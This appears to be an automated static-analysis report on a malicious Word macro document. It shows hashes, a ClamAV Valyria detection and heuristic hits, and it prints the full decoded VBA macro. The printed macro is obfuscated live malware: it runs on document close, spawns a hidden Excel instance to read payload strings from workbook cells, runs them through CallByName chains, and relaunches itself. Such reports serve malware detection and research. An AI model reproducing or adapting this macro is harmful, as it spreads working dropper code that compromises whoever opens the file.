Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 78c61d082c003fb3…

MALICIOUS

Office (OOXML)

71.9 KB Created: 2021-01-20 12:51:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-01-23
MD5: c3f44669e05999db4451c6482862d76f SHA-1: c82ab4e16bf67cc9a6b7b0534a1e1a003efe7d31 SHA-256: 78c61d082c003fb36ad22128f60fa352fa41916ef3d4323f1b5d71d531763369
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-10033904-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set og = CreateObject(UserForm1.ComboBox1)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    c2 = CallByName(Application, zy, 2)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9473 bytes
SHA-256: 6ade23e33c39907cd6286c9301590312b1e726e5fdebecc6d7c22e95dae8cac6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public ti, nb, e8v, iem0, kto3e
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
Err.Number = 0
mvpyo = Application.Options.MatchFuzzyProlongedSoundMark
If ed5v > 3131 Then
kmh3 = Application.Options.AutoFormatAsYouTypeApplyDates
ed5v = kmh3
End If
UserForm2.ComboBox1.ListIndex = 2
Dim og
d6um3 = Application.Options.SaveInterval
If mvpyo > 4842 Then
co2h0 = Application.Options.SendMailAttach
mvpyo = co2h0
End If
Set og = CreateObject(UserForm1.ComboBox1)
og.DisplayAlerts = False
zy = "visible"
btk5 = "OnTime"
Dim xkg
obvzj = Application.Options.SmartCutPaste
If nbz > 3795 Then
rejm9 = Application.Options.AutoFormatPlainTextWordMail
nbz = rejm9
nbz = Application.Options.CreateBackup
If d6um3 > 1265 Then
bl4d = Application.Options.MatchFuzzyBV
d6um3 = bl4d
End If
End If
mvr = Application.Options.MatchFuzzyPunctuation
If obvzj > 3283 Then
gpm0o = Application.Options.AutoWordSelection
obvzj = gpm0o
End If
vaks = 1
wdjkj = 1
While vaks <> 0 And wdjkj < 3
Set xkg = og.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
vaks = Err.Number
wdjkj = wdjkj + 1
Wend
If vaks <> 0 Then
c2 = CallByName(Application, zy, 2)
yc8g = Application.Options.MatchFuzzyAY
If mvr > 4939 Then
p3 = Application.Options.DeletedTextColor
mvr = p3
End If
If c2 = True Then
Set jra = CreateObject(UserForm1.ComboBox3)
jra.Documents.Open ActiveDocument.FullName, ReadOnly:=True
rn = Application.Options.SendMailAttach
If yc8g > 3473 Then
z8 = Application.Options.MatchFuzzyHF
yc8g = z8
End If
jra.Run "ThisDocument.nnn"
Else
ls = Application.Options.AutoFormatApplyOtherParas
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
og.Quit
ez2pa = Application.MillimetersToPoints(98)
If ls > 1504 Then
zbnrj = Application.Options.GridOriginHorizontal
ls = zbnrj
End If
Exit Sub
End If
Dim jshz
Set jshz = og.sheets(1)
t8eu = "'"
vo = og.sheets(3).Cells(151, 5).Value
nb = og.sheets(2).Cells(149, 23).Value
ti = jshz.Cells(67, 19).Value
y9 = og.sheets(2).Cells(223, 14).Value
hbaek = og.sheets(3).Cells(218, 2).Value
r3l = og.sheets(3).Cells(61, 26).Value
st3 = og.sheets(2).Cells(92, 27).Value
ws = og.sheets(3).Cells(182, 22).Value
tv81q = og.sheets(1).Cells(150, 13).Value
rs = og.sheets(2).Cells(144, 36).Value
s9 = Application.Options.EnableSound
If ez2pa > 4800 Then
ufrp = Application.Options.AutoFormatApplyFirstIndents
ez2pa = ufrp
End If
korf = Application.Options.AutoCreateNewDrawings
If s9 > 4417 Then
w4ycx = Application.Options.AutoFormatApplyBulletedLists
s9 = w4ycx
End If
lh = jshz.Cells(18, 15).Value
bzed4 = Application.Options.AnimateScreenMovements
dcf = og.sheets(3).Cells(71, 26).Value
x9 = og.sheets(2).Cells(55, 24).Value
rlq = Application.Options.EnableSound
If bzed4 > 3970 Then
j9nxb = Application.Options.RevisedPropertiesMark
bzed4 = j9nxb
End If
c4 = og.sheets(3).Cells(134, 15).Value
fu2i = og.sheets(3).Cells(164, 4).Value
jzb7 = og.sheets(3).Cells(69, 13).Value
ia3r = jshz.Cells(103, 30).Value
aaxl = og.sheets(2).Cells(20, 6).Value
w2 = jshz.Cells(23, 26).Value
t0 = og.sheets(3).Cells(44, 3).Value
gjvq = og.sheets(1).Cells(142, 45).Value
tz = og.sheets(2).Cells(205, 5).Value
kto3e = og.sheets(1).Cells(78, 38).Value
v1 = og.sheets(1).Cells(254, 1).Value
ty0i = og.sheets(2).Cells(162, 25).Value
gaui = jshz.Cells(2, 34).Value
e12r = CallByName(og, vo, 2)
Set u0 = UserForm1.Controls.Add("Forms.ComboBox.1")
u0.Value = st3 & e12r & t0
Set yzvo8 = UserForm1.Controls.Add("Forms.ComboBox.1")
yzvo8.Value = ty0i
CallByName CreateObject(lh), x9, 1, u0, hbaek, yzvo8
ayff7 = Application.Options.AutoFormatAsYouTypeReplaceQuotes
If rlq > 3773 Then
we8 = Application.Options.Overtype
rlq = we8
End If
Set q = CreateObject(tz)
Set knbb = CallByName(q, fu2i, 2)
Set qz = CallByName(knbb, gjvq, 1)
Set aaxl = CallByName(q, aaxl, 2)
Set iem0 = q
Set y9 = CallByName(aaxl, y9, 2)
Set tv81q = CallByName(y9, tv81q, 2)
jyzz = Application.Options.AutoFormatApplyLists
If ayff7 > 4642 Then
k88w = Application.Options.GridDistanceHorizontal
ayff7 = k88w
End If
Set ed5v = CallByName(tv81q, gaui, 1, w2)
Set ti = CallByName(ed5v, ti, 2)
ai9a = Application.Options.MatchFuzzyCase
If jyzz > 4051 Then
wgz = Application.Options.AutoKeyboardSwitching
jyzz = wgz
End If
c4 = CallByName(ti, c4, 2)
CallByName ti, dcf, 1, 1, c4
Set e8v = UserForm1.Controls.Add("Forms.ComboBox.1")
ik = Application.Options.AutoFormatReplaceFarEastDashes
If ai9a > 466 Then
bk = Application.Options.DisableFeaturesIntroducedAfterbyDefault
ai9a = bk
End If
ec = Application.Options.GridDistanceHorizontal
If ik > 506 Then
ryzc = Application.Options.AutoFormatReplaceFarEastDashes
ik = ryzc
End If
e8v.Value = r3l & ia3r
UserForm3.ComboBox1 = rs
e8v.Value = v1
chz = Application.Options.RevisedLinesMark
If ec > 415 Then
i3ry = Application.Options.AutoKeyboardSwitching
ec = i3ry
End If
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = c4
q = Nothing
b = Application.Options.PasteMergeFromPPT
If chz > 3141 Then
jb7 = Application.Options.DefaultTray
chz = jb7
End If
eo4d = Application.Options.SequenceCheck
If b > 2659 Then
nc = Application.Options.DefaultBorderLineStyle
b = nc
End If
kq19v = Application.Options.ArabicMode
asd = Application.Options.IgnoreUppercase
If kq19v > 3258 Then
ky3 = Application.Options.ShowFormatError
kq19v = ky3
End If
xkg = Nothing
jshz = Nothing
knbb = Nothing
qz = Nothing
aaxl = Nothing
y9 = Nothing
tv81q = Nothing
ed5v = Nothing
ti = Nothing
ah = Application.Options.EnableSound
If gyxv > 3240 Then
fy = Application.Options.CheckGrammarAsYouType
gyxv = fy
gyxv = Application.Options.EnableHangulHanjaRecentOrdering
If asd > 4749 Then
w8q9y = Application.Options.AutoWordSelection
asd = w8q9y
End If
End If
gb5a = Application.Options.AddBiDirectionalMarksWhenSavingTextFile
If ah > 2272 Then
mq = Application.Options.AllowAccentedUppercase
ah = mq
End If
vsaz5 = Application.Options.AutoFormatDeleteAutoSpaces
If gb5a > 722 Then
e23z = Application.Options.MatchFuzzyDash
gb5a = e23z
End If
szffk = Application.Options.MapPaperSize
If vsaz5 > 3294 Then
xfo = Application.Options.ArabicNumeral
vsaz5 = xfo
End If
iem0 = Nothing
DoEvents
CallByName og, ws, 1
ef = Application.Options.AutoFormatMatchParentheses
If szffk > 4466 Then
c28 = Application.Options.FormatScanning
szffk = c28
End If
og = Nothing
DoEvents
htr7 = Application.Options.AddBiDirectionalMarksWhenSavingTextFile
If ef > 1205 Then
knq = Application.Options.AddControlCharacters
ef = knq
End If
CallByName CreateObject(lh), jzb7, 1, st3 & e12r & t0
b4cq = Application.Options.AutoFormatAsYouTypeReplaceSymbols
If htr7 > 3600 Then
htzad = Application.Options.UseDiffDiacColor
htr7 = htzad
End If
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F777ECA2-09DC-4850-914D-08FF6A28687D}{E13AFF8E-F188-445A-BD4F-224B47AF5F78}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{366EC4B9-29FE-44C1-89D7-7049B32C0804}{D0E11C09-AEB6-47F7-A31C-4B2A1A63367C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 On Error GoTo ErrorHandler

 p0sp0 = UserForm2.Controls.Count - 1
 
 If Len(UserForm1.ComboBox4) > 10 Then
 p0sp0 = p0sp0 * 2
 End If

vndwp = Application.Options.Overtype

If jg994 > 4062 Then


qqk = ActiveDocument.Name

jg994 = qqk

End If


 g34eu = ""
 For jg994 = 1 To p0sp0 Step 2
 g34eu = g34eu & UserForm2.Controls.Item(jg994)
 Next

 ComboBox1.AddItem "ek"
 ComboBox1.AddItem "zo"
 ComboBox1.AddItem g34eu
 ComboBox1.AddItem "x9se1"
 
 Exit Sub
 
ErrorHandler:
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{D79CB512-A024-4440-93B5-D702A1882C61}{2845FF9E-20C0-4410-B4B2-A9B1A7EF4D54}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ti, ActiveDocument.nb, VbMethod, ActiveDocument.e8v
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{F070E9C4-A189-4B69-8B4A-A283E20C5B3B}{8B2B1764-6032-47AA-9A37-33DF81AE01FD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.iem0, ActiveDocument.kto3e, VbMethod, ActiveDocument.e8v
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 44544 bytes
SHA-256: fc17873ffbbaf90804ebfd7a90b5060d0b32ea55caada0b3171f97c089747d7d
Detection
ClamAV: Doc.Malware.Valyria-10033904-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.